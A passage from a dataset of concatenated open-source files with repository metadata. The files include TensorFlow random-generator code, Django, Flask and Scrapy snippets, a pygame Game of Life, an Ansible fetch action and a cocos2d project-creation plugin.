counts = [10., 20.]
# Probability of success.
probs = [0.8, 0.9]
rng = tf.random.experimental.Generator(seed=234)
binomial_samples = rng.binomial(shape=[2], counts=counts, probs=probs)
```
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
counts: A 0/1-D Tensor or Python value`. The counts of the binomial
distribution.
probs: A 0/1-D Tensor or Python value`. The probability of success for the
binomial distribution.
dtype: The type of the output. Default: tf.int32
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random binomial values.
"""
dtype = dtypes.as_dtype(dtype)
with ops.name_scope(name, "binomial", [shape, counts, probs]) as name:
counts = ops.convert_to_tensor(counts, name="counts")
probs = ops.convert_to_tensor(probs, name="probs")
shape_tensor = _shape_tensor(shape)
return gen_stateful_random_ops.stateful_random_binomial(
self.state.handle,
self.algorithm,
shape=shape_tensor,
counts=counts,
probs=probs,
dtype=dtype,
name=name)
# TODO(wangpeng): implement other distributions
def _make_int64_keys(self, shape=()):
# New independent keys are generated via
# `new_key[i] = hash(old_key, counter+i)`, which is exactly what
# `uniform_full_int(dtype=int64)` does for PhiloxRandom_64_128_128 and
# ThreeFry_64_64_64.
return self.uniform_full_int(shape=shape, dtype=dtypes.int64)
def make_seeds(self, count=1):
"""Generates seeds for stateless random ops.
For example:
```python
seeds = get_global_generator().make_seeds(count=10)
for i in range(10):
seed = seeds[:, i]
numbers = stateless_random_normal(shape=[2, 3], seed=seed)
...
```
Args:
count: the number of seed pairs (note that stateless random ops need a
pair of seeds to invoke).
Returns:
A tensor of shape [2, count] and dtype int64.
"""
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
keys = self._make_int64_keys(shape=[count])
# The two seeds for stateless random ops don't have individual semantics
# and are scrambled together, so setting one to zero is fine.
zeros = array_ops.zeros_like(keys)
return array_ops.stack([keys, zeros])
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def split(self, count=1):
"""Returns a list of independent `Generator` objects.
Two generators are independent of each other in the sense that the
random-number streams they generate don't have statistically detectable
correlations. The new generators are also independent of the old one.
The old generator's state will be changed (like other random-number
generating methods), so two calls of `split` will return different
new generators.
For example:
```python
gens = get_global_generator().split(count=10)
for gen in gens:
numbers = gen.normal(shape=[2, 3])
# ...
gens2 = get_global_generator().split(count=10)
# gens2 will be different from gens
```
The new generators will be put on the current device (possible different
from the old generator's), for example:
```python
with tf.device("/device:CPU:0"):
gen = Generator(seed=1234) # gen is on CPU
with tf.device("/device:GPU:0"):
gens = gen.split(count=10) # gens are on GPU
```
Args:
count: the number of generators to return.
Returns:
A list (length `count`) of `Generator` objects independent of each other.
The new generators have the same RNG algorithm as the old one.
"""
def _key_to_state(alg, key):
# Padding with zeros on the left. The zeros will be the counter.
return [0] * (_get_state_size(alg) - 1) + [key]
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
keys = self._make_int64_keys(shape=[count])
return [Generator(state=_key_to_state(alg, key), alg=alg)
for key in keys.numpy()]
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
# It's not safe to create TF ops before `init_google` is called, so this is
# initialized to None and get a value the first time `get_global_generator` is
# called.
global_generator = None
@tf_export("random.experimental.get_global_generator")
def get_global_generator():
global global_generator
if global_generator is None:
global_generator = Generator.from_non_deterministic_state()
return global_generator
@tf_export("random.experimental.set_global_generator")
def set_global_generator(generator):
"""Replaces the global generator with another `Generator` object.
This function creates a new Generator object (and the Variable object within),
which does not work well with tf.function because (1) tf.function puts
restrictions on Variable creation thus reset_global_generator can't be freely
used inside tf.function; (2) redirecting a global variable to
a new object is problematic with tf.function because the old object may be
captured by a 'tf.function'ed function and still be used by it.
A 'tf.function'ed function only keeps weak references to variables,
so deleting a variable and then calling that function again may raise an
error, as demonstrated by
random_test.py/RandomTest.testResetGlobalGeneratorBadWithDefun .
Args:
generator: the new `Generator` object.
"""
global global_generator
global_generator = generator
| [
"yoncho@student.42seoul.kr"
] | yoncho@student.42seoul.kr |
d6d5d5a9eba6c4cf1a0f551bde6f4c3a5002289c | 91d3aab052eb514387438c85892e308c3de5eb57 | /lambda/bin/chardetect | 606133ea8d5e21c23733b6fa0a6734ae47ffe6ed | [
"MIT"
] | permissive | piotrbelina/cloudguruchallenge-multicloud | 9188b65f5bd401c8e1cd25ec4dd645791f3fb448 | 9f55180b8d6cfced2313bc6926c261d3b0428ac5 | refs/heads/master | 2023-02-27T08:37:39.331098 | 2021-01-31T20:51:06 | 2021-01-31T20:51:06 | 334,745,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | #!/Users/piotr/PycharmProjects/acg-multicloud-2/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"belina.piotr@gmail.com"
] | belina.piotr@gmail.com | |
0dd59283c23f6efd099fab1cd91a211a9f117803 | 72697f9324ef7115177af49ef5744f438fd947a0 | /bids/management/commands/create_item.py | cff2affad5e0c105292a39254433886c1a560422 | [] | no_license | webclinic017/bidserver | 9f3a06ae516425dcb7aa9b1a40f1b62c194df8d1 | 45a45d48ed76d0855c6b70e7ecc571dee45f52e5 | refs/heads/main | 2023-03-20T08:44:30.676705 | 2021-03-22T20:45:36 | 2021-03-22T20:45:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | from django.core.management.base import BaseCommand, CommandError
from bids.models import Item
class Command(BaseCommand):
help = "Creates an item"
def add_arguments(self, parser):
parser.add_argument("name", type=str)
parser.add_argument("description", type=str)
def handle(self, *args, **options):
name = options["name"]
description = options["description"]
Item.objects.update_or_create(name=name, defaults={"description": description})
self.stdout.write(
self.style.SUCCESS('Successfully created/updated item "%s"' % name)
)
| [
"davidespihernandez@gmail.com"
] | davidespihernandez@gmail.com |
0d17315f1da15b554d26efd323795675e81c51fd | 6c8aa0f149ef1c9136255a102f3ed45f14713590 | /app.py | aded041311e56b6a57771c29e5727e4c6da38a63 | [] | no_license | nls20/Gym_App_Project | 15da0e1a581cb54db246f57f67cc37add06f4f79 | 58305642b1029fe151cfbd25c18e1c5809aec560 | refs/heads/main | 2023-04-09T16:47:29.390092 | 2021-04-08T14:15:08 | 2021-04-08T14:15:08 | 336,502,284 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | from flask import Flask, render_template
from controllers.session_controller import sessions_blueprint
from controllers.member_controller import members_blueprint
from controllers.booking_controller import bookings_blueprint
app = Flask(__name__)
app.register_blueprint(sessions_blueprint)
app.register_blueprint(members_blueprint)
app.register_blueprint(bookings_blueprint)
@app.route('/')
def home():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True) | [
"nls20@hotmail.co.uk"
] | nls20@hotmail.co.uk |
d15050aedde9ddd35d41dcb058a546c64bce086c | b60a51c6e483c2380097a4b3aba0ee0996204594 | /board.py | aa08eafdd71a9cc84a48d3ea772f7dd9659655f3 | [] | no_license | jnwjack/GameOfLife | 9f9ce2fc0a072164890326674c58ff0e67af3042 | 166ce66f18296c6810543a22577a741574fc1f7b | refs/heads/main | 2023-04-07T06:30:47.115746 | 2021-04-07T19:04:14 | 2021-04-07T19:04:14 | 352,454,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,167 | py | import pygame
from screen_object import ScreenObject
MIN_N = 1
MAX_N = 100
class Board(ScreenObject):
"""
Object that holds state of the grid as a 2D array. Also handles the drawing of the
grid onto the screen.
"""
def __init__(self, n):
self.n = n
self.rect = None
self.grid = []
self.height = 0
self.backgroundColor = (255, 255, 255)
self.top = 20
self.left = 0
self.lineColor = (0, 0, 0)
self.squareFillColor = (0, 0, 0)
self.autoPlay = False
self.delay = 25
self.tick = 0
# Store 'alive' indexes in set
self.aliveCellCoords = set()
self.origin = (0, 0)
self.offset = int(self.n / 2)
def initializeGrid(self):
# Create n x n grid
self.aliveCellCoords = set()
def calculateSize(self, screenSize):
# Height and width are equal to 75% of window height
idealHeight = int(0.75 * screenSize[1])
lineSpacing = int(idealHeight / self.n)
self.height = lineSpacing * self.n
self.left = screenSize[0]/2 - self.height/2
self.rect = pygame.Rect(self.left, self.top, self.height, self.height)
def draw(self, screen):
pygame.draw.rect(screen.surface, self.backgroundColor, self.rect)
lineSpacing = self.height / self.n
for i in range(self.n):
lineLeft = self.left + (i * lineSpacing)
# Draw vertical line
pygame.draw.line(screen.surface, self.lineColor, (lineLeft, self.top), (lineLeft, self.top + self.height))
lineTop = self.top + (i * lineSpacing)
# Draw horizontal line,
pygame.draw.line(screen.surface, self.lineColor, (self.left, lineTop), (self.left + self.height, lineTop))
# Draw horizontal and vertical lines at very end
pygame.draw.line(screen.surface, self.lineColor, (self.left + self.height, self.top), (self.left + self.height, self.top + self.height))
pygame.draw.line(screen.surface, self.lineColor, (self.left, self.top + self.height), (self.left + self.height, self.top + self.height))
# Draw 'alive' cells that are within the viewing window
for (cartesianX, cartesianY) in self.aliveCellCoords:
(indexX, indexY) = self.cartesianToBoardIndex((cartesianX, cartesianY))
# If cell is outside viewing window, skip drawing it
if(indexX < 0 or indexX >= self.n or indexY < 0 or indexY >= self.n):
continue
cellRect = pygame.Rect(self.left + (indexX * lineSpacing), self.top + (indexY * lineSpacing), lineSpacing, lineSpacing)
pygame.draw.rect(screen.surface, self.squareFillColor, cellRect)
def handleClick(self, pos):
# Mark/Unmark the clicked cell on the board
relativeX = pos[0] - self.left
relativeY = pos[1] - self.top
lineSpacing = self.height / self.n
indexX = int(relativeX / lineSpacing)
indexY = int(relativeY / lineSpacing)
(cartesianX, cartesianY) = self.boardIndexToCartesian((indexX, indexY))
if((cartesianX, cartesianY) in self.aliveCellCoords):
self.aliveCellCoords.remove((cartesianX, cartesianY))
else:
self.aliveCellCoords.add((cartesianX, cartesianY))
def handleMouseWheel(self, pos, direction):
# Zoom in/out by 10 cells, set offset to match
lineSpacing = self.height / self.n
newN = self.n + direction
if(newN <= MAX_N and newN >= MIN_N):
self.n += 10 * direction
self.offset = int(self.n / 2)
def cycle(self):
if(self.autoPlay):
self.tick += 1
if(self.tick == self.delay):
self.advanceState()
self.tick = 0
def boardIndexToCartesian(self, pos):
x = pos[0] - self.offset + self.origin[0]
y = pos[1] - self.offset + self.origin[1]
return (x, y)
def cartesianToBoardIndex(self, pos):
x = pos[0] + self.offset - self.origin[0]
y = pos[1] + self.offset - self.origin[1]
return (x, y)
def getPositionAfterWrap(self, point):
upperBound = int(MAX_N / 2)
lowerBound = upperBound * -1
if(point > upperBound):
return lowerBound
if(point < lowerBound):
return upperBound
return point
def getNeighbors(self, coords):
neighborOffsets = [
(offsetX, offsetY)
for offsetX in range(-1, 2)
for offsetY in range(-1, 2)
]
neighborOffsets.remove((0,0))
neighbors = [(self.getPositionAfterWrap(coords[0] + x), self.getPositionAfterWrap(coords[1] + y)) for (x, y) in neighborOffsets]
return neighbors
def advanceState(self):
# TODO: Implement the logic for Game of Life
nextState = set()
neighborEncounters = dict()
for coord in self.aliveCellCoords:
neighbors = self.getNeighbors(coord)
for neighbor in neighbors:
if not neighbor in neighborEncounters:
neighborEncounters[neighbor] = 1
else:
neighborEncounters[neighbor] += 1
aliveNeighbors = len([
neighbor
for neighbor in neighbors
if neighbor in self.aliveCellCoords
])
if(aliveNeighbors in set([2,3])):
nextState.add(coord)
for neighbor in neighborEncounters:
if(neighborEncounters[neighbor] == 3):
nextState.add(neighbor)
self.aliveCellCoords = nextState
| [
"jnw900@gmail.com"
] | jnw900@gmail.com |
1b60d1ceb9bfaba24c29ea19083a0b65e1a6462b | 54d0bd8b196b67e3fc29c5f3de593a1061174037 | /tests/therapy_week_test.py | eff84c3a45db2398fa83268b9ba68836aa9e9a55 | [] | no_license | dalabarda/CasparAssignment | 57d0db39e7b8e1639c9940619f368686eb5589c5 | 03dd4b897b7ad3320d8884c384d2e4b4db610b8b | refs/heads/master | 2022-11-14T12:59:43.306269 | 2020-07-05T23:24:31 | 2020-07-05T23:24:31 | 276,755,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,050 | py | import unittest
import pytest
from base.BasePage import BasePage
from pages.therapy_week_page import TherapyWeekPageTest
import utilities.CustomLogger as cl
@pytest.mark.usefixtures("beforeClass", "beforeMethod")
class TherapyWeekTest(unittest.TestCase):
@pytest.fixture(autouse=True)
def classObjects(self):
self.tp = TherapyWeekPageTest(self.driver)
self.bp = BasePage(self.driver)
@pytest.mark.run(order=1)
def test_chatWithTherapistGIF(self):
cl.allureLogs("App Launched")
self.tp.navigateToTherapyWeek()
self.tp.clickOnExercisesCard()
self.tp.clickOnTheFirstExerciseVideo()
# if self.tp.checkInfoMsg():
self.tp.clickOnYesButton()
self.tp.clickOnSettingsButton()
self.tp.clickOnMirrorSwitch()
self.tp.clickOnAllowButton()
self.tp.clickOnRecordSwitch()
self.tp.clickOnSaveSettings()
self.tp.clickOnSettingsButton()
self.tp.xxx()
#self.bp.keyCode(63)
#self.driver.press_keycode(63)
| [
"dalabarda@gmail.com"
] | dalabarda@gmail.com |
a49179e98e1e4d5547c21825f5c9fc0dc80c865d | 26fe7e861fd79b9951a81619e57caad13e88fc87 | /extractingKeyPhrases5.py | aaa25b098f47f248c50060ba8ef9f88b08b9596b | [] | no_license | eitherWei/keyPhraseExtraction | d3ff9a6a5bae5a71104435a147bb587433acdef2 | 65e932e2cb02b31f8c0eec42b1044621a7e7647a | refs/heads/master | 2020-05-20T12:32:50.285245 | 2019-06-14T07:44:47 | 2019-06-14T07:44:47 | 185,574,625 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,359 | py | from methods_main2 import *
import time
import pandas as pd
from collections import Counter
import sys
start = time.time()
import nltk
# import a dataset
dataset = pd.DataFrame()
# initialise methods class
path = "/Users/stephenbradshaw/Documents/codingTest/AutomaticKeyphraseExtraction-master/data/"
methods = mainMethods(path)
# extracts the files handles
methods.extractFileNames(path)
# clump of extraction methods
dataset = methods.extractFles()
#return methods.cleanSent( text)
dataset['brokenCorpus'] = methods.tokeniseCorpus(dataset)
# break being mindful of separators
dataset['stopWordRemoved'] = dataset.brokenCorpus.apply(methods.stopwordRemoval)
# returns an array of corpus : corpus = array of docs with tokenisedArrayStrings
dataset['procesedString'] = methods.cleanString(list(dataset.stopWordRemoved))
# extract the target keyPhrases and lemmatise them
dataset['targetTerms'] = methods.extractTargetTerms(dataset)
####################################################################
#posFriendlyCorpus = dataset.procesedString.apply(extractPosTags)
term_list = []
term_idf_list = []
doc_id_list = []
def buildAndProcessText(targetAmount, corpus):
for indexVal in range(targetAmount):
text = methods.extractPosTags(corpus[indexVal])
#print(text)
Text = []
for value in text:
sentArray = []
for v in value:
if v != "_":
sentArray.append(v)
if len(sentArray) > 0:
Text.append(sentArray)
print('this run is {}'.format(indexVal))
graph = methods.plotDiGraph([Text])
textRankDict = methods.computePageRank(graph)
#text = all_corpus_rejoined[indexVal]
# extract all candidate phrases
all_Phrase = []
for array in text:
all_Phrase.extend(array)
# reduct that to unique in stances
all_Phrase = list(set(all_Phrase))
# iterate over and
for phrase in all_Phrase:
phraseList = phrase.split()
if len(phraseList) > 1:
value = 0
for p in phraseList:
if p in textRankDict:
value += textRankDict[p]
value = value/len(phraseList)
textRankDict[phrase] = value
local_id_list = [ indexVal for x in range(len(textRankDict))]
local_term_list = list(textRankDict.keys())
local_term_idf_list = list(textRankDict.values())
term_list.extend(local_term_list)
term_idf_list.extend(local_term_idf_list)
doc_id_list.extend(local_id_list)
targetAmount = 211
buildAndProcessText(targetAmount, dataset['procesedString'])
#print(term_list)
df = pd.DataFrame({"doc_id_list": doc_id_list, "term_list" : term_list, "term_idf_list": term_idf_list})
indexList = methods.extractIndexLocationForAllTargetTerms(df, dataset, targetAmount, title = "indexListDf.pkl", failSafe = True)
indexValues = []
for dict1 in indexList:
indexValues.append(dict1.values())
print("size of index array {}".format(len(indexValues)))
relIndexLoc = methods.rankLocationIndex(indexValues)
methods.plotIndexResults( relIndexLoc)
#targetAmount = 1
#buildAndProcessText(targetAmount, dataset['procesedString'])
print(10*"-*-")
print((time.time() - start)/60)
| [
"noreply@github.com"
] | eitherWei.noreply@github.com |
d6e214d0a8d4d12652eee9f7bca72966d79550f4 | f9684c301ce50a6bbb5a75280cd4c70277119f27 | /yelpdetails/yelpdetails/pipelines.py | 55531cab7d87353200bd42058134f3e8878cb6be | [] | no_license | vaibhav89000/yelpdetails | 76149f2feed5cbad98b3e67d3a786223289fc1f4 | b7ce6f739a7f76fbe665e27eb097475775c0c489 | refs/heads/master | 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
def __init__(self):
self.create_connection()
self.create_table()
def create_connection(self):
self.conn = sqlite3.connect("yelpdetails.db")
self.curr = self.conn.cursor()
def create_table(self):
self.curr.execute("""DROP TABLE IF EXISTS detail""")
self.curr.execute("""create table detail(
Name text,
website_link text,
website_name text,
phone text,
Direction text,
category text,
find text,
near text,
email text,
website text
)""")
# pass
def process_item(self, item, spider):
self.store_db(item)
return item
def store_db(self,item):
self.curr.execute("""insert into detail values (?,?,?,?,?,?,?,?,?,?)""",(
item['Name'],
item['website_link'],
item['website_name'],
item['phone'],
item['Direction'],
item['category'],
item['find'],
item['near'],
item['email'],
item['website']
))
self.conn.commit()
| [
"vaibhav89000@gmail.com"
] | vaibhav89000@gmail.com |
74fc682933cb011cca980ecd739e54f9abd6589a | 1fb1f29323a3a332e7872d0bd74cfc854da6a239 | /机器学习课程/Logistic regression(iris).py | 35949c9ef955ffd2a1e0907a0e0450d5c605d2fb | [] | no_license | updu/University_code | 5691ed24e1ae2134a1fab0f1ef981ba3d0df0b54 | fb5ffaa65d728a15fa15886c18068575b58e10d7 | refs/heads/master | 2023-03-04T12:59:11.754615 | 2021-01-16T09:37:12 | 2021-01-16T09:37:12 | 267,497,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | # -*- coding:utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import datasets
from sklearn.model_selection import train_test_split
# 使用sklearn的datasets加载iris数据集
iris = datasets.load_iris()
# 获取数据集
x = iris.data[:, :2]
y = (iris.target != 0) * 1
print(y)
# 画数据分布图
plt.figure(figsize=(10, 6))
plt.scatter(x[y == 0][:, 0], x[y == 0][:, 1], color='b', label='0')
plt.scatter(x[y == 1][:, 0], x[y == 1][:, 1], color='r', label='1')
plt.legend();
# 分割训练集与测试集
from sklearn.model_selection import train_test_split
# x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.5)
# x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1)
loss_arr = []
iter_num = 0
iter_arr = []
# print(loss_arr)
class Logistic:
# 初始化学习率lr,初始化训练次数iter_num
def __init__(self, lr=0.01, iter_num=100000):
self.lr = lr
self.iter_num = iter_num
def __x_init(self, x_train):
# 创建一个全1矩阵
x_shape = np.ones((x_train.shape[0], 1))
# 数据集x每行对应于一个实例,最后增加一列元素恒置为1,使用concatenate方法增加
return np.concatenate((x_shape, x_train), axis=1)
# sigmoid函数
def __sigmoid(self, z):
return 1.0 / (1.0 + np.exp(-z))
# 损失函数
def __loss(self, h, y_train):
return (-y_train * np.log(h) - (1 - y_train) * np.log(1 - h)).mean()
def fit(self, x_train, y_train):
x_train = self.__x_init(x_train)
self.theta = np.zeros(x_train.shape[1])
# 梯度下降更新theta
for i in range(self.iter_num):
z = np.dot(x_train, self.theta)
h = self.__sigmoid(z)
gradient = np.dot(x_train.T, (h - y_train) / y_train.size)
self.theta -= self.lr * gradient
z = np.dot(x_train, self.theta)
h = self.__sigmoid(z)
loss = self.__loss(h, y_train)
loss_arr.append(loss)
if (i % 1000 == 0):
print(f'loss: {loss} \t')
# 预测概率
def predict_prob(self,x_train):
x_train = self.__x_init(x_train)
return self.__sigmoid(np.dot(x_train,self.theta))
def predict(self,x_train):
return self.predict_prob(x_train).round()
model = Logistic(lr=0.01, iter_num=5000)
model.fit(x_train, y_train)
preds = model.predict(x_test)
(preds == y_test).mean()
print((preds == y_test).mean())
plt.figure(figsize=(10, 6))
for i in range(5000):
iter_arr.append(i)
x = iter_arr
y = loss_arr
plt.plot(x, y)
plt.show() | [
"noreply@github.com"
] | updu.noreply@github.com |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py | 8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py |
def run(self, tmp=None, task_vars=None):
' handler for fetch operations '
if (task_vars is None):
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if self._play_context.check_mode:
result['skipped'] = True
result['msg'] = 'check mode not (yet) supported for this module'
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
result['failed'] = True
result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
return result
if ((source is None) or (dest is None)):
result['failed'] = True
result['msg'] = 'src and dest are required'
return result
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source)
remote_checksum = None
if (not self._play_context.become):
remote_checksum = self._remote_checksum(source, all_vars=task_vars)
remote_data = None
if (remote_checksum in ('1', '2', None)):
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('failed'):
if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
else:
result.update(slurpres)
return result
else:
if (slurpres['encoding'] == 'base64'):
remote_data = base64.b64decode(slurpres['content'])
if (remote_data is not None):
remote_checksum = checksum_s(remote_data)
remote_source = slurpres.get('source')
if (remote_source and (remote_source != source)):
source = remote_source
if (os.path.sep not in self._connection._shell.join_path('a', '')):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if (not dest.startswith('/')):
dest = self._loader.path_dwim(dest)
else:
if ('inventory_hostname' in task_vars):
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
dest = dest.replace('//', '/')
if (remote_checksum in ('0', '1', '2', '3', '4')):
if (remote_checksum == '0'):
result['msg'] = 'unable to calculate the checksum of the remote file'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '1'):
if fail_on_missing:
result['failed'] = True
result['msg'] = 'the remote file does not exist'
result['file'] = source
else:
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '2'):
result['msg'] = 'no read permission on remote file, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '3'):
result['msg'] = 'remote file is a directory, fetch cannot work on directories'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '4'):
result['msg'] = "python isn't present on the system. Unable to compute checksum"
result['file'] = source
result['changed'] = False
return result
local_checksum = checksum(dest)
if (remote_checksum != local_checksum):
makedirs_safe(os.path.dirname(dest))
if (remote_data is None):
self._connection.fetch_file(source, dest)
else:
try:
f = open(to_bytes(dest, errors='strict'), 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError(('Failed to fetch the file: %s' % e))
new_checksum = secure_hash(dest)
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if (validate_checksum and (new_checksum != remote_checksum)):
result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
return result
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
15c905ae580067073fd0a97c8dc681b8fe2c0432 | 518c7e2514194f5c4ebe8f52a53730e447637339 | /android/ottopi/screens.py | 6a71bf37ed9ee28fbb2398f8ece57efd18278f34 | [
"Apache-2.0"
] | permissive | sergei/ottopi | 881df6dea782731a6b7c0b85bab8b1e830e65637 | 49b4639c8f7efc405e831b0a037f14b5b54351fa | refs/heads/master | 2023-07-24T07:16:32.888467 | 2023-07-22T17:07:37 | 2023-07-22T17:07:37 | 27,190,376 | 1 | 0 | NOASSERTION | 2023-03-05T20:21:41 | 2014-11-26T18:27:29 | Java | UTF-8 | Python | false | false | 990 | py | import json
import os
import sys
PIC_FORMAT = """
<div>
<p style="float: left;"><a href="{img}"><img src="{img}" width="360"></a></p>
<p>{body}</p>
</div>
<div style="clear: left;">
</div>
"""
def json_to_md(json_file):
src_dir = os.path.split(json_file)[0]
md_file = src_dir + os.sep + os.path.splitext(os.path.split(json_file)[1])[0] + '.md'
with open(json_file, 'r') as f, open(md_file, 'w') as md:
s = f.read()
json_s = '[' + s[:-2] + ']'
screen_shots = json.loads(json_s)
for screen_shot in screen_shots:
md.write('### ' + screen_shot['header'])
md.write('\n\n')
md.write(PIC_FORMAT.format(img=src_dir + os.sep + screen_shot['image'], body=screen_shot.get('body', '')))
md.write('\n\n')
print('{} created'.format(md_file))
if __name__ == '__main__':
if len(sys.argv) == 2:
json_to_md(sys.argv[1])
else:
print('Usage {} screens.json'.format(sys.argv[0]))
| [
"spodshivalov@scmarinetech.com"
] | spodshivalov@scmarinetech.com |
884592cfa154499c47be91d6bad6bd52b7e937c4 | 83bf18586dca52274c7b0e3cf2a33a9ba1b18f33 | /exam/App/views.py | 43dc877c1e557f9227dcb8a8eb83da6d54f5de0f | [] | no_license | peinniku/django-first-touch | ddf1c27903c25d2a7f5abb97e8060472b899d6e0 | 1396b042502fadbd7b38e469fc62a1f02eaf3d02 | refs/heads/master | 2023-02-19T05:57:12.549076 | 2021-01-21T11:42:08 | 2021-01-21T11:42:08 | 331,605,768 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | from django.http import HttpResponse
from django.shortcuts import render, redirect
# Create your views here.
from django.urls import reverse
from App.models import User
def index(request):
users = User.objects.all()
return render(request, 'index.html', context={'title': 'django', 'name': '用戶', 'users': users})
# return HttpResponse('首頁')
def get_name(request, name):
print(request.GET)
print(request.GET.getlist('age'))
return HttpResponse(name)
def http_redirect(request):
return redirect(reverse('tel', args=('1234-56795978',)))
def tel(request, phone):
return HttpResponse(phone)
| [
"1078228403@qq.com"
] | 1078228403@qq.com |
7be6fc930083d7aaee6527c344ddea013c549bbe | c08ae967923c09d53de575167f160cadd56acb15 | /tools/cocos2d-console/plugins/plugin_new/project_new.py | 5af8450179cf3dd3a3f4ffb647910f0c68c81d75 | [
"MIT"
] | permissive | namkazt/cocos2dx-lite | 9e41b2380443785027027cb9d357dd39f2e79df4 | 4d6f0702d30a5bc6f46f6da10f9c29678e0d0127 | refs/heads/master | 2021-01-17T22:18:35.981597 | 2016-08-14T05:24:51 | 2016-08-14T05:24:51 | 62,821,903 | 2 | 0 | null | 2016-07-07T16:30:23 | 2016-07-07T16:30:22 | null | UTF-8 | Python | false | false | 27,998 | py | #!/usr/bin/python
# ----------------------------------------------------------------------------
# cocos "new" plugin
#
# Copyright 2013 (C) cocos2d-x.org
#
# License: MIT
# ----------------------------------------------------------------------------
'''
"new" plugin for cocos command line tool
'''
__docformat__ = 'restructuredtext'
# python
import os
import sys
import getopt
import ConfigParser
import json
import shutil
import cocos
from MultiLanguage import MultiLanguage
import cocos_project
import re
import utils
from collections import OrderedDict
#
# Plugins should be a sublass of CCJSPlugin
#
class CCPluginNew(cocos.CCPlugin):
DEFAULT_PROJ_NAME = {
cocos_project.Project.CPP: 'MyCppGame',
cocos_project.Project.LUA: 'MyLuaGame',
cocos_project.Project.JS: 'MyJSGame'
}
@staticmethod
def plugin_name():
return "new"
@staticmethod
def brief_description():
return MultiLanguage.get_string('NEW_BRIEF')
def init(self, args):
self._projname = args.name
self._projdir = unicode(
os.path.abspath(os.path.join(args.directory, self._projname)), "utf-8")
self._lang = args.language
self._package = args.package
self._tpname = args.template
# new official ways to get the template and cocos paths
self._templates_paths = self.get_templates_paths()
self._cocosroot = self.get_cocos2d_path()
# search for custom paths
if args.engine_path is not None:
self._cocosroot = os.path.abspath(args.engine_path)
self._cocosroot = unicode(self._cocosroot, "utf-8")
tp_path = os.path.join(self._cocosroot, "templates")
if os.path.isdir(tp_path):
self._templates_paths.append(tp_path)
# remove duplicates keeping order
